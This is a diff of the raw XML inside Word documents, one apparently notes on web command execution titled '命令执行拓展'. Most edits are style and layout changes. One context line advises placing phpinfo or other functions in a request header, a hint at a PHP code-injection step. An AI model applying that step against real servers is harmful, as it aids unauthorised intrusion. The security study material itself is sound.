+      <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
+      <w:b/>
+      <w:bCs/>
+      <w:kern w:val="0"/>
+      <w:sz w:val="36"/>
+      <w:szCs w:val="36"/>
+      <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:default="1" w:styleId="6">
     <w:name w:val="Default Paragraph Font"/>
     <w:semiHidden/>
     <w:uiPriority w:val="0"/>
   </w:style>
-  <w:style w:type="table" w:default="1" w:styleId="4">
+  <w:style w:type="table" w:default="1" w:styleId="5">
     <w:name w:val="Normal Table"/>
     <w:semiHidden/>
+    <w:qFormat/>
     <w:uiPriority w:val="0"/>
     <w:tblPr>
       <w:tblCellMar>
@@ -2029,9 +3543,10 @@
       </w:tblCellMar>
     </w:tblPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="2">
+  <w:style w:type="paragraph" w:styleId="3">
     <w:name w:val="HTML Preformatted"/>
     <w:basedOn w:val="1"/>
+    <w:qFormat/>
     <w:uiPriority w:val="0"/>
     <w:pPr>
       <w:tabs>
@@ -2062,7 +3577,7 @@
       <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="3">
+  <w:style w:type="paragraph" w:styleId="4">
     <w:name w:val="Normal (Web)"/>
     <w:basedOn w:val="1"/>
     <w:uiPriority w:val="0"/>
@@ -2077,13 +3592,22 @@
       <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="character" w:styleId="6">
+  <w:style w:type="character" w:styleId="7">
     <w:name w:val="Hyperlink"/>
-    <w:basedOn w:val="5"/>
+    <w:basedOn w:val="6"/>
     <w:uiPriority w:val="0"/>
     <w:rPr>
       <w:color w:val="0000FF"/>
       <w:u w:val="single"/>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="8">
+    <w:name w:val="HTML Code"/>
+    <w:basedOn w:val="6"/>
+    <w:uiPriority w:val="0"/>
+    <w:rPr>
+      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
+      <w:sz w:val="20"/>
     </w:rPr>
   </w:style>
 </w:styles>

--- a/命令执行拓展.docx
+++ b/命令执行拓展.docx
@@ -587,18 +587,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
         </w:rPr>
-        <w:t>方法二</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="default" w:ascii="Calibri Light" w:hAnsi="Calibri Light" w:cs="Calibri Light"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
-        </w:rPr>
-        <w:t>：</w:t>
+        <w:t>方法二：</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -887,8 +876,6 @@
         </w:rPr>
         <w:t>然后在数据包里随便家的请求头里面放phpinfo或者其他函数</w:t>
       </w:r>
-      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
-      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -1894,8 +1881,8 @@
       <w:r>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="114300" distR="114300">
-            <wp:extent cx="3463925" cy="1685925"/>
-            <wp:effectExtent l="0" t="0" r="3175" b="3175"/>
+            <wp:extent cx="4284345" cy="2085340"/>
+            <wp:effectExtent l="0" t="0" r="8255" b="10160"/>
             <wp:docPr id="2" name="图片 1"/>
             <wp:cNvGraphicFramePr>
               <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
@@ -1918,7 +1905,7 @@
                   <pic:spPr>
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="3463925" cy="1685925"/>
+                      <a:ext cx="4284345" cy="2085340"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -1934,6 +1921,8 @@
           </wp:inline>
         </w:drawing>
       </w:r>
+      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="0"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -3322,18 +3311,18 @@
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Body Text Indent 2"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Body Text Indent 3"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Block Text"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Hyperlink"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Hyperlink"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="FollowedHyperlink"/>
     <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Strong"/>
     <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Emphasis"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Document Map"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Plain Text"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="E-mail Signature"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Normal (Web)"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Normal (Web)"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Acronym"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Address"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Cite"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Code"/>
+    <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Code"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Definition"/>
     <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Keyboard"/>
     <w:lsdException w:qFormat="1" w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="HTML Preformatted"/>
@@ -3580,6 +3569,7 @@
   <w:style w:type="paragraph" w:styleId="4">
     <w:name w:val="Normal (Web)"/>
     <w:basedOn w:val="1"/>
+    <w:qFormat/>
     <w:uiPriority w:val="0"/>
     <w:pPr>
       <w:spacing w:before="0" w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1"/>
@@ -3595,6 +3585,7 @@
   <w:style w:type="character" w:styleId="7">
     <w:name w:val="Hyperlink"/>
     <w:basedOn w:val="6"/>
+    <w:qFormat/>
     <w:uiPriority w:val="0"/>
     <w:rPr>
       <w:color w:val="0000FF"/>
@@ -3604,6 +3595,7 @@
   <w:style w:type="character" w:styleId="8">
     <w:name w:val="HTML Code"/>
     <w:basedOn w:val="6"/>
+    <w:qFormat/>
     <w:uiPriority w:val="0"/>
     <w:rPr>
       <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
